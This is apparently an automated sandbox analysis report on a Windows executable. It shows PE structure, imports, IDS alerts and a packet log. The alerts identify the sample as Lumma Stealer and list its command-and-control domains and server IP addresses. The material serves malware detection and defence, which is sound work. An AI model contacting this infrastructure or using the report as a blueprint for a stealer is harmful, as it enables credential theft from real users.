                                                                                                                                                                                                                                                                        mov word ptr [00456BFCh], es
                                                                                                                                                                                                                                                                        mov word ptr [00456BF8h], fs
                                                                                                                                                                                                                                                                        mov word ptr [00456BF4h], gs
                                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                                        pop dword ptr [00456C28h]
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                        mov dword ptr [00456C1Ch], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                        mov dword ptr [00456C20h], eax
                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                        mov dword ptr [00456C2Ch], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                                        mov dword ptr [00456B68h], 00010001h
                                                                                                                                                                                                                                                                        mov eax, dword ptr [00456C20h]
                                                                                                                                                                                                                                                                        mov dword ptr [00456B1Ch], eax
                                                                                                                                                                                                                                                                        mov dword ptr [00456B10h], C0000409h
                                                                                                                                                                                                                                                                        mov dword ptr [00456B14h], 00000001h
                                                                                                                                                                                                                                                                        mov eax, dword ptr [00454004h]
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [00454008h]
                                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                                        call dword ptr [000000C0h]

                                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                        • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                        • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5296c0x50.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4310000xf430.rsrc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x524d00x40.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x510000x188.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        .text0x10000x4fe4c0x500006fa4e302ee04298d9ef2d3f153c40e85False0.84364013671875data7.542990652047153IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rdata0x510000x224c0x24006e858d54905a9a5f8a9ead82a28e3b16False0.3491753472222222data5.344533170604138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .data0x540000x3dc49c0x700028a57dd7288e2b8b2562b2ba5629c13aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .rsrc0x4310000xf4300xf60097c576aca8eda0ec829e9e2a78595657False0.4743870680894309data5.067941475082293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                        RT_CURSOR0x43c0c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                                                                                                                                                                        RT_ICON0x4316100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.3296908315565032
                                                                                                                                                                                                                                                                        RT_ICON0x4324b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.3935018050541516
                                                                                                                                                                                                                                                                        RT_ICON0x432d600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.3945852534562212
                                                                                                                                                                                                                                                                        RT_ICON0x4334280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.4031791907514451
                                                                                                                                                                                                                                                                        RT_ICON0x4339900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkmenTurkmenistan0.22074688796680497
                                                                                                                                                                                                                                                                        RT_ICON0x435f380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkmenTurkmenistan0.24835834896810507
                                                                                                                                                                                                                                                                        RT_ICON0x436fe00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkmenTurkmenistan0.2778688524590164
                                                                                                                                                                                                                                                                        RT_ICON0x4379680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkmenTurkmenistan0.30319148936170215
                                                                                                                                                                                                                                                                        RT_ICON0x437e480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.8264925373134329
                                                                                                                                                                                                                                                                        RT_ICON0x438cf00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.868231046931408
                                                                                                                                                                                                                                                                        RT_ICON0x4395980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.8277649769585254
                                                                                                                                                                                                                                                                        RT_ICON0x439c600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.7485549132947977
                                                                                                                                                                                                                                                                        RT_ICON0x43a1c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.8330206378986866
                                                                                                                                                                                                                                                                        RT_ICON0x43b2700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.8442622950819673
                                                                                                                                                                                                                                                                        RT_ICON0x43bbf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8599290780141844
                                                                                                                                                                                                                                                                        RT_STRING0x43d1400x47adata0.4424083769633508
                                                                                                                                                                                                                                                                        RT_STRING0x43d5c00xc8data0.57
                                                                                                                                                                                                                                                                        RT_STRING0x43d6880x6a8data0.43133802816901406
                                                                                                                                                                                                                                                                        RT_STRING0x43dd300x600data0.4303385416666667
                                                                                                                                                                                                                                                                        RT_STRING0x43e3300x802data0.41804878048780486
                                                                                                                                                                                                                                                                        RT_STRING0x43eb380x75edata0.4268292682926829
                                                                                                                                                                                                                                                                        RT_STRING0x43f2980x56cdata0.4546109510086455
                                                                                                                                                                                                                                                                        RT_STRING0x43f8080x6cedata0.4293915040183697
                                                                                                                                                                                                                                                                        RT_STRING0x43fed80x556data0.44363103953147875
                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x43cf700x14data1.25
                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x43c0600x68dataTurkmenTurkmenistan0.7115384615384616
                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x437dd00x76dataTurkmenTurkmenistan0.6610169491525424
                                                                                                                                                                                                                                                                        RT_VERSION0x43cf880x1b4data0.5665137614678899

                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        KERNEL32.dllSetDefaultCommConfigA, GetNumaProcessorNode, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, SetFileAttributesA, UnregisterWait, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, SetLocaleInfoW, UpdateResourceW, OpenFileMappingW, WriteConsoleOutputAttribute, WriteProcessMemory, BuildCommDCBW, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
                                                                                                                                                                                                                                                                        USER32.dllGetProcessDefaultLayout
                                                                                                                                                                                                                                                                        GDI32.dllGetBitmapBits

                                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                        TurkmenTurkmenistan

                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                        2024-12-14T14:08:20.314370+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149710104.21.56.70443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:22.125562+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149711176.113.115.1980TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:26.932851+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.11651231.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:27.080742+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.11506951.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:28.700029+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.1149727104.21.22.222443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:28.700029+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149727104.21.22.222443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:31.833197+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1149727104.21.22.222443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:31.833197+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149727104.21.22.222443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:31.890380+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.11600701.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:33.255896+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.1149739104.21.96.1443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:33.255896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149739104.21.96.1443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:35.496884+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1149739104.21.96.1443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:35.496884+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149739104.21.96.1443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:35.503971+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.11620091.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:35.645792+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.11537611.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:35.788540+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.11559521.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:35.932103+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.11499911.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:36.072146+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.11507511.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:36.213814+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.11629871.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:37.950634+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149754104.102.49.254443TCP
                                                                                                                                                                                                                                                                        2024-12-14T14:08:38.895332+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1149754104.102.49.254443TCP

                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.457506895 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.457540989 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.457637072 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.468993902 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:18.469011068 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:19.690826893 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:19.691133022 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:19.749334097 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:19.749365091 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:19.749732971 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:19.749886036 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:19.753660917 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:19.799324989 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.314376116 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.314474106 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.314485073 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.314567089 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.407368898 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.407385111 CET44349710104.21.56.70192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.407391071 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.407454967 CET49710443192.168.2.11104.21.56.70
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.664305925 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.784174919 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.784265041 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.784470081 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:20.904640913 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125427008 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125515938 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125561953 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125561953 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125566006 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125576019 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125715971 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125735044 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125742912 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125756025 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125762939 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125798941 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125869989 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125875950 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125890017 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125930071 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.125930071 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.245464087 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.245507956 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.245548010 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.245585918 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.249540091 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.249739885 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.317687988 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.317709923 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.317806005 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.321742058 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.321829081 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.321861029 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.321985006 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.330316067 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.330398083 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.333236933 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.333309889 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.333472013 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.333729029 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.341674089 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.341753960 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.341789961 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.341804028 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.350084066 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.350147963 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.350259066 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.350363016 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.358484983 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.358546972 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.358603001 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.358644009 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.366926908 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.366976976 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.367002964 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.367039919 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.375339031 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.375397921 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.375437975 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.375485897 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.384038925 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.384108067 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.384140968 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.384201050 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.391360998 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.391416073 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.391491890 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.391535997 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.399012089 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.399068117 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.399079084 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.399122953 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.437732935 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.437799931 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.509841919 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.509963989 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.509991884 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.510046005 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.512186050 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.512260914 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.512429953 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.512532949 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.517045975 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.517119884 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.517162085 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.517211914 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.521920919 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.521997929 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.522006035 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.522052050 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.526622057 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.526691914 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.526833057 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.526880026 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.531359911 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.531429052 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.531441927 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.531516075 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.535940886 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.536000013 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.536043882 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.536086082 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.540437937 CET8049711176.113.115.19192.168.2.11
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.540508986 CET4971180192.168.2.11176.113.115.19
                                                                                                                                                                                                                                                                        Dec 14, 2024 14:08:22.540532112 CET8049711176.113.115.19192.168.2.11
